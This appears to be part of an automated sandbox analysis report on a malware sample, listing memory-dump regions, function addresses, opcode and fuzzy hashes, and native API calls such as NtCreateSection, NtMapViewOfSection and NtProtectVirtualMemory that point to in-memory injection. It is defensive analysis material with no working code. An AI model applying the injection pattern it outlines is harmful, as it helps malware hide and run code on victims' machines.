                                        • Opcode ID: e13e4353264cb03f41c9eab083c2ad47e7ae41980dea388a528b5b0554aa3fa2
                                        • Instruction ID: 33c1358c8e124053bd5a42890407c3670decec403562083b3a578ff00710e20e
                                        • Opcode Fuzzy Hash: e13e4353264cb03f41c9eab083c2ad47e7ae41980dea388a528b5b0554aa3fa2
                                        • Instruction Fuzzy Hash: 72B28472E116298FDB64CF69C89869DB7B2BB44310F5685AAD80AEB340D770DD85CFC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "C2?$;!@
                                        • API String ID: 0-298799055
                                        • Opcode ID: 32185cb7e682a8acae0c2ed9fbb5fde1e7fa95aabe0b761ea4c3c6bf16b03636
                                        • Instruction ID: 174e1d510b45e8cec3aa7bd02ae158e31b8604c847e29bf8e7876a1b7e7983dc
                                        • Opcode Fuzzy Hash: 32185cb7e682a8acae0c2ed9fbb5fde1e7fa95aabe0b761ea4c3c6bf16b03636
                                        • Instruction Fuzzy Hash: DD235E75E002189FDB54DFA8E8D4A9DBBB2FF88324F1441A9E509AB361DB349D81DF40

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: +q$$$5'$<B=z
                                        • API String ID: 0-1297642020
                                        • Opcode ID: 08c6125a5a0b720574e86ddbd90cddd447901adb00743f0480dbb4808fa94ddc
                                        • Instruction ID: 35e270c3ab5c6d4c96e5cc05b563759ee7d77be8590dbd1ab3163ce0ac4f897d
                                        • Opcode Fuzzy Hash: 08c6125a5a0b720574e86ddbd90cddd447901adb00743f0480dbb4808fa94ddc
                                        • Instruction Fuzzy Hash: 02621972F106289FDB58DF6DD894659B6E2BB88310B4A856AEC09EB354DF70DC41CBC0

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *i.$3n$ ym^
                                        • API String ID: 0-1890479547
                                        • Opcode ID: 8e4a03140aec74e5851cab64f223a9d14c939c284497396a397cd47feceed0a3
                                        • Instruction ID: cb5e5167a063846e15169bf215412cede61c1485926f599ddf142b8e07c92039
                                        • Opcode Fuzzy Hash: 8e4a03140aec74e5851cab64f223a9d14c939c284497396a397cd47feceed0a3
                                        • Instruction Fuzzy Hash: 2462A536F101248FC754DF68D89099AB7F6FB8431475A856AD80AEB395DB31ED06CBC0

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %f#2$SS$R
                                        • API String ID: 0-2568461884
                                        • Opcode ID: cf76d34603b710483430f20b7e83b504b0a223fe299630b377f5799be3e25c0a
                                        • Instruction ID: 475bfae18bcbb50df2f8133f01f7ea60a015af45b0c9c3f6bd56693115b434ca
                                        • Opcode Fuzzy Hash: cf76d34603b710483430f20b7e83b504b0a223fe299630b377f5799be3e25c0a
                                        • Instruction Fuzzy Hash: 2EE18874B102059FCB44CF98E8C0A5AF7E2BB88304B69C529E01ADB395DB75ED06CB84

                                        Control-flow Graph

                                        • Function 0x5a07e29; basic blocks 0x5a07e29-0x5a083a0; call targets: 0x6c70148, 0x5a00af8 (graph rendering not reproduced in text)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %f#2$SS$R
                                        • API String ID: 0-2568461884
                                        • Opcode ID: 92b8671eba51b957692a1e0d013981aad354d47a3d0f0768be78720ea9583d36
                                        • Instruction ID: 4b81051610e604469c9226a06982f08ff418748ba4ec42a2ed71749879ba012b
                                        • Opcode Fuzzy Hash: 92b8671eba51b957692a1e0d013981aad354d47a3d0f0768be78720ea9583d36
                                        • Instruction Fuzzy Hash: DAD18774B102059FCB44CF99E8D0A5AF7E3BB88304B69C529E40ADB395DB75ED06CB84

                                        Control-flow Graph

                                        • Function 0x5dfbc90; basic blocks 0x5dfbc90-0x5dfd1c6; call targets (several call sites list alternative targets): 0x518c01f, 0x518c038, 0x518c280, 0x51a0388, 0x51a03b8, 0x51a20fc, 0x51a218c, 0x51a23d0, 0x5dfa0f1, 0x5dfbc80, 0x5dfbc90 (self), 0x5dfcbf8, 0x5dfd101, 0x5dfd280, 0x5dfd5ad (graph rendering not reproduced in text)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4 a$3)
                                        • API String ID: 0-3265370097
                                        • Opcode ID: ec2cadf7d2b880850fc7b92ac2ad1f9f25a7dc5041b64faaf34531910be90670
                                        • Instruction ID: 69cefb1b655af8c9114173f282166d00642b43e5527770455378abfaedcd56d7
                                        • Opcode Fuzzy Hash: ec2cadf7d2b880850fc7b92ac2ad1f9f25a7dc5041b64faaf34531910be90670
                                        • Instruction Fuzzy Hash: 70C2B675F001288BDB54DF68C8906AEB7F6BB88310F55856AD84AEB391DB349D42CFD0

                                        Control-flow Graph

                                        • Function 0x5a017a0; basic blocks 0x5a017a0-0x5a02e8a; call targets (several call sites list alternative targets): 0x5a01747, 0x5a017a0 (self), 0x5a029b3, 0x5a02c88, 0x5a02c98, 0x5a03119, 0x5a03230, 0x5a03698 (graph rendering not reproduced in text)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '5($}Yg
                                        • API String ID: 0-2291141081
                                        • Opcode ID: 59d9a00f24a6300cd48c6a1ce0f7e2e9b0327b11d8bfdcab593766985be9a591
                                        • Instruction ID: 3de136f2d12844dfcc467a4d87eb32bfc9f5b7cc2918292b785d44da9bbda4cc
                                        • Opcode Fuzzy Hash: 59d9a00f24a6300cd48c6a1ce0f7e2e9b0327b11d8bfdcab593766985be9a591
                                        • Instruction Fuzzy Hash: C8C27135E102248FCB54DF68D894A99B7B2BF88314F55C5AAD809EB391DB35DD82CF80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1>0\
                                        • API String ID: 0-4206732142
                                        • Opcode ID: 307ab53b1b4e386cd15195708d25a13a1a675dc230ab7d958e4ea2cbafc1a638
                                        • Instruction ID: 566e51a0e915bcf72a87043e665d772f0eb641daab5ff20559dcbfa4424515d2
                                        • Opcode Fuzzy Hash: 307ab53b1b4e386cd15195708d25a13a1a675dc230ab7d958e4ea2cbafc1a638
                                        • Instruction Fuzzy Hash: CB03A536F101248FD754DFA8D89096AB7F6BB88310B59C56AD809EB395DB31ED06CBC0

                                        Control-flow Graph

                                        • Function 0x5df62c0; basic blocks 0x5df62c0-0x5df6ba9; call targets (one call site lists alternative targets): 0x518c01f, 0x518c038, 0x518c280, 0x5df62c0 (self) (graph rendering not reproduced in text)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ({*N$2<+!
                                        • API String ID: 0-160365616
                                        • Opcode ID: 84cd5684fc147f09d23714bc775b67a0791b3c8c8ef5c959c6b89d36618f61fb
                                        • Instruction ID: 4da762ad1f045a31590c26293d11ca4c074cc901bcd9b97589fba2537942ed06
                                        • Opcode Fuzzy Hash: 84cd5684fc147f09d23714bc775b67a0791b3c8c8ef5c959c6b89d36618f61fb
                                        • Instruction Fuzzy Hash: 2432E672F102258FC714DF6DD880999B7E3BF8822071A856AED0AEB755DA30DD46CBD0

                                        Control-flow Graph

                                        • Function 0x51872c0; basic blocks 0x51872c0-0x51879b6; no call edges in graph (graph rendering not reproduced in text)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1<2$d
                                        • API String ID: 0-4226095807
                                        • Opcode ID: 4946be11f15e71f3a6097a23c939bc0535270853eb61719ad656e13fa2fb3178
                                        • Instruction ID: b3d74795c49b6bb1da3a7a67c1afa4e2decb13cecb786950d0edbbadf4be8420
                                        • Opcode Fuzzy Hash: 4946be11f15e71f3a6097a23c939bc0535270853eb61719ad656e13fa2fb3178
                                        • Instruction Fuzzy Hash: DD22B071A006199FDB24DF69C8809AAF7B2FF84310B25856AD829EB391D731EC45CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: l1#$IA5
                                        • API String ID: 0-2870753020
                                        • Opcode ID: 297eb8a33a526039e5a055567f6a08214929e2c4828e66bb1f96154fab78068c
                                        • Instruction ID: a44cd6835f90494cb49ff02d9a67ecfaaf0efb054915c94532cc6be151d32e89
                                        • Opcode Fuzzy Hash: 297eb8a33a526039e5a055567f6a08214929e2c4828e66bb1f96154fab78068c
                                        • Instruction Fuzzy Hash: B8125075F006148FC754DFA8C884A99B7F2BB88314B5AC56AD809EB355DB31ED46CF80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 3808acf99e75adbce944831da58fc5b5e973ec2188825d9f1400ebfcf1cf436a
                                        • Instruction ID: 0cbb08018d5301dbfc22e3b4c81e3474af9bef2e97ef19ffda8e3310003f614c
                                        • Opcode Fuzzy Hash: 3808acf99e75adbce944831da58fc5b5e973ec2188825d9f1400ebfcf1cf436a
                                        • Instruction Fuzzy Hash: DCF26276E116298FDB24CF68D884A99F7F2BB48310F1582AAD81DE7345D731AD85CF80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8M&e$=89x
                                        • API String ID: 0-2030983731
                                        • Opcode ID: 5b48678e0bde935194d082eaedb815033499fcf0b9f942ead60ac731eccec994
                                        • Instruction ID: 07069633b2d52fc402614d7497c2640776e4e3ae0729aceb413dcc81df34276c
                                        • Opcode Fuzzy Hash: 5b48678e0bde935194d082eaedb815033499fcf0b9f942ead60ac731eccec994
                                        • Instruction Fuzzy Hash: 88E18572F006288FCB14DF9DD8945AEB7F2BB8835075A856AE819EB351D774EC418BC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3w*n
                                        • API String ID: 0-1459975921
                                        • Opcode ID: 222b20906e159fbae984a71161cd9801414238d5b614462bbcdc9e779117c683
                                        • Instruction ID: 6ea54ba43cc610cc4ebd686f7da977fe9e341e4249686a5765dfc52b776c698f
                                        • Opcode Fuzzy Hash: 222b20906e159fbae984a71161cd9801414238d5b614462bbcdc9e779117c683
                                        • Instruction Fuzzy Hash: FAE25076E102298FDB64DF58C984A9DB7F2BB48314F1981EAD809EB351D7359E81CF80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3)
                                        • API String ID: 0-1390963136
                                        • Opcode ID: 615605320e1d68a87ab8d33fe40c68740f2babb4854685f8985c07be3378d78a
                                        • Instruction ID: 113d57aa66d19042344228b1e6dce0fbccac855a98dce9070aced1fefabed90c
                                        • Opcode Fuzzy Hash: 615605320e1d68a87ab8d33fe40c68740f2babb4854685f8985c07be3378d78a
                                        • Instruction Fuzzy Hash: 4F82B776F001288BDB54DF78D8907AEB7F6AB88310F45859AD84AEB391DB349D418FD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e38a46e5ec7e43f1a2b02cff1d3b9c1e8ade86ec1d4196c4809b581c1871820
                                        • Instruction ID: 0c8d4247b73089ca9619adb1893d951d99c9bdf43615ed24c03c0b73c541fa79
                                        • Opcode Fuzzy Hash: 0e38a46e5ec7e43f1a2b02cff1d3b9c1e8ade86ec1d4196c4809b581c1871820
                                        • Instruction Fuzzy Hash: 15038375E112258FCB64DF68D854A9EB7F2BF88304F1585AAD809E7390DB359D82CF80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =*$\
                                        • API String ID: 0-2246754351
                                        • Opcode ID: 748542859da5a3d0031c7e8657194774bb8e897e50188e5408a866d422cd6871
                                        • Instruction ID: 598d89cbc4d6504a1a42ebde49caa34d87fcfaf16f91715eb24792bb65c7ba7c
                                        • Opcode Fuzzy Hash: 748542859da5a3d0031c7e8657194774bb8e897e50188e5408a866d422cd6871
                                        • Instruction Fuzzy Hash: D422A375B002148FC754DFA8D894A6DBBF6BF88310B55C56AE809DB385DB34ED42CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :<#
                                        • API String ID: 0-3453961554
                                        • Opcode ID: c50b81d17ff7ddceef3f818af74a28e9bb45bdfa96437c2e0981fec076581897
                                        • Instruction ID: c028ada4c863decf51223ed1ac87eb102a136364f2f5d0e7f764aed869ebf6ba
                                        • Opcode Fuzzy Hash: c50b81d17ff7ddceef3f818af74a28e9bb45bdfa96437c2e0981fec076581897
                                        • Instruction Fuzzy Hash: 9F12C835F001149FC754DFA8D9A4B6AB7E6FF84314B1A806AD90AEB395CB35DD02CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dym^
                                        • API String ID: 0-3129611225
                                        • Opcode ID: 57b38cd12a44a4dd32b6ebf9d5924e263804cb4df0be4c73d87c81aae7d1588d
                                        • Instruction ID: 5873705d78f47b134b2c1dd358bea6010376205e9f6aa6467c24a28af8ae0111
                                        • Opcode Fuzzy Hash: 57b38cd12a44a4dd32b6ebf9d5924e263804cb4df0be4c73d87c81aae7d1588d
                                        • Instruction Fuzzy Hash: 15F1F675B002189FD704DFA8D890A6EB7F6EF84314B19856AE809EB345DB35ED06CBD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4i"
                                        • API String ID: 0-3288562762
                                        • Opcode ID: 2700c35f8300a495086329e492738fe83198511da3d7b996b4aec8cccd3209c3
                                        • Instruction ID: 39fd3fbf7618f351fd23867d4f3259281a9d6d4e38518a4a482702c80217d92e
                                        • Opcode Fuzzy Hash: 2700c35f8300a495086329e492738fe83198511da3d7b996b4aec8cccd3209c3
                                        • Instruction Fuzzy Hash: 61F15F36E001148FDB54DFADC984A9DB7F2BB88310B1AC169E819EB351D731ED42CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =*$\
                                        • API String ID: 0-2246754351
                                        • Opcode ID: 234ffdda522c486ba53273898c3c5a9e347cab513ce870f93cad3ea9b5afbae9
                                        • Instruction ID: 97f2249cda3412014067ee9d9297e5d6ce1f6c3fe63e45013c57480f2b86fc6f
                                        • Opcode Fuzzy Hash: 234ffdda522c486ba53273898c3c5a9e347cab513ce870f93cad3ea9b5afbae9
                                        • Instruction Fuzzy Hash: 3D024079B002248FC754DFA8D890A6DB7F6BB88310B55C56AD849EB345DB31ED42CF90
                                        APIs
                                        • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 05184DB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: SectionView
                                        • String ID:
                                        • API String ID: 1323581903-0
                                        • Opcode ID: 2870d352128f569b8743fd0783c23bdfb7a003f03560b301558725c288d4d8f6
                                        • Instruction ID: f616d9401ff677fe6ca87dea5f4038bdf26bd10baa63fa049e30da4f59d1dad9
                                        • Opcode Fuzzy Hash: 2870d352128f569b8743fd0783c23bdfb7a003f03560b301558725c288d4d8f6
                                        • Instruction Fuzzy Hash: 5F310476900209AFDF10DFA9D880ADEBFF5FF48314F54851AE918A3210C7759950CFA4
                                        APIs
                                        • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 05184DB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: SectionView
                                        • String ID:
                                        • API String ID: 1323581903-0
                                        • Opcode ID: be7e33433c02a22b9f058bc2d91e9cfb20610ebfbe65340d82b5b43ed7ca75d2
                                        • Instruction ID: 857a06cdada5b0067d3fb5171732bafd9f222b5d6366eb71f58e1aeea74cc546
                                        • Opcode Fuzzy Hash: be7e33433c02a22b9f058bc2d91e9cfb20610ebfbe65340d82b5b43ed7ca75d2
                                        • Instruction Fuzzy Hash: EA310376900209AFDF10DFAAD880ADEBBF5FF4C324F54851AE918A3210C775A950CFA4
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05184701
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 00e7b536b29d2f2fa2fc4bc20a9cc788bdd9b302e0f69fdce0d0b4b5bae57bca
                                        • Instruction ID: d4f682ad4eaf1a4c529b8eb624fbb0409031a4115d367c3770b93c9ccab8b320
                                        • Opcode Fuzzy Hash: 00e7b536b29d2f2fa2fc4bc20a9cc788bdd9b302e0f69fdce0d0b4b5bae57bca
                                        • Instruction Fuzzy Hash: A12126B5D013499FDB10DFAAD980ADEFBF5FF48310F50881AE419A7250C775A900CBA4
                                        APIs
                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 05184BFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: CreateSection
                                        • String ID:
                                        • API String ID: 2449625523-0
                                        • Opcode ID: 3a2e63b9808c97f18c8ba1589a12abd7eefcf6bb8cb64332549889fa2d200dcb
                                        • Instruction ID: b19f44ffbdeaaed1756ef4d7b77bb3acf5bf07688038f5fdb8767321e61b56b5
                                        • Opcode Fuzzy Hash: 3a2e63b9808c97f18c8ba1589a12abd7eefcf6bb8cb64332549889fa2d200dcb
                                        • Instruction Fuzzy Hash: DB2126B1D01259AFDB00DF9AD980ADEFBB4FF48310F50851AE518A7200C7799A54CFA4
                                        APIs
                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 05184B21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileOpen
                                        • String ID:
                                        • API String ID: 2669468079-0
                                        • Opcode ID: 46e631621368aa0372c247c43706380bd950d4ae9817379903b25b428e1aa3b3
                                        • Instruction ID: 8701f770c0bad5659a03a7d4c222a323d81bf558cad39b0ef6da5237255692d3
                                        • Opcode Fuzzy Hash: 46e631621368aa0372c247c43706380bd950d4ae9817379903b25b428e1aa3b3
                                        • Instruction Fuzzy Hash: 8221F4B1D01259AFDB00DFAAD984ADEFBB4FF48314F50851AE518A7240C7799A14CBA4
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 051847D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: aa90a7f091ea7c64f6754ea8d080ba22aa603d8554f28ee30c4fc55c95af29be
                                        • Instruction ID: 57122775229b8b29b2aa00d17da9c3a0ff9ec17ad5af18a00d4f8ce17e9bea85
                                        • Opcode Fuzzy Hash: aa90a7f091ea7c64f6754ea8d080ba22aa603d8554f28ee30c4fc55c95af29be
                                        • Instruction Fuzzy Hash: 642123B69002499FDB10DFAAD880BDEFBF5FF48310F50881AE518A7210C774A954CFA4
                                        APIs
                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 05184BFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: CreateSection
                                        • String ID:
                                        • API String ID: 2449625523-0
                                        • Opcode ID: 78f1228fb58f374307b5973e287ee015e6a41429f53223dba017b7ee12d01714
                                        • Instruction ID: 88b910d2d0870601ba853f290d1753782c46029413f8388458a06dbd70f4c12c
                                        • Opcode Fuzzy Hash: 78f1228fb58f374307b5973e287ee015e6a41429f53223dba017b7ee12d01714
                                        • Instruction Fuzzy Hash: 872105B1D01259AFDF10DFAAD980AEEFBB4FF48310F50851AE518A7240C7759954CFA4
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05184701
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 7e4eb047a15ef302dc237cd4d61bf297c0e521b72380615cfe9b924ee7919e55
                                        • Instruction ID: fc3fea0dd5e4db458c70a4827b1e7eec63ee31f97b9e978ded70164bceb6fb58
                                        • Opcode Fuzzy Hash: 7e4eb047a15ef302dc237cd4d61bf297c0e521b72380615cfe9b924ee7919e55
                                        • Instruction Fuzzy Hash: BA21F4B1D013499FDB10DFAAD880AAEFBF5FF48310F50882AE419A7240C775A904CBA4
                                        APIs
                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 05184B21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileOpen
                                        • String ID:
                                        • API String ID: 2669468079-0
                                        • Opcode ID: a4b447202d6c19d86c03622b44ab87fa8f5f90c729e266ec0c5b8070722ed67e
                                        • Instruction ID: f293caa5e124ccc00e0b1def7d5573e7a96c5af92ff6db398e79b39ba4c0909c
                                        • Opcode Fuzzy Hash: a4b447202d6c19d86c03622b44ab87fa8f5f90c729e266ec0c5b8070722ed67e
                                        • Instruction Fuzzy Hash: EC2105B1D01259AFDB00DFAAD884ADEFBB4FF48314F50851AE518A7240C7759A14CFA4
                                        APIs
                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 05184F56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: ControlDeviceFile
                                        • String ID:
                                        • API String ID: 3512290074-0
                                        • Opcode ID: 3c1b055a2c19fa64ae37de199e0c2b31986e196422361e3f1630d54ce8febec9
                                        • Instruction ID: bf4f1978bacce6b540e20afee25d802c8c9b7fa649ca7c67070fda274067e230
                                        • Opcode Fuzzy Hash: 3c1b055a2c19fa64ae37de199e0c2b31986e196422361e3f1630d54ce8febec9
                                        • Instruction Fuzzy Hash: 042159728002499FDF10DFAAD840AEEFBF5FF48314F54881AE519A7250C7799914CFA4
                                        APIs
                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 05184F56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: ControlDeviceFile
                                        • String ID:
                                        • API String ID: 3512290074-0
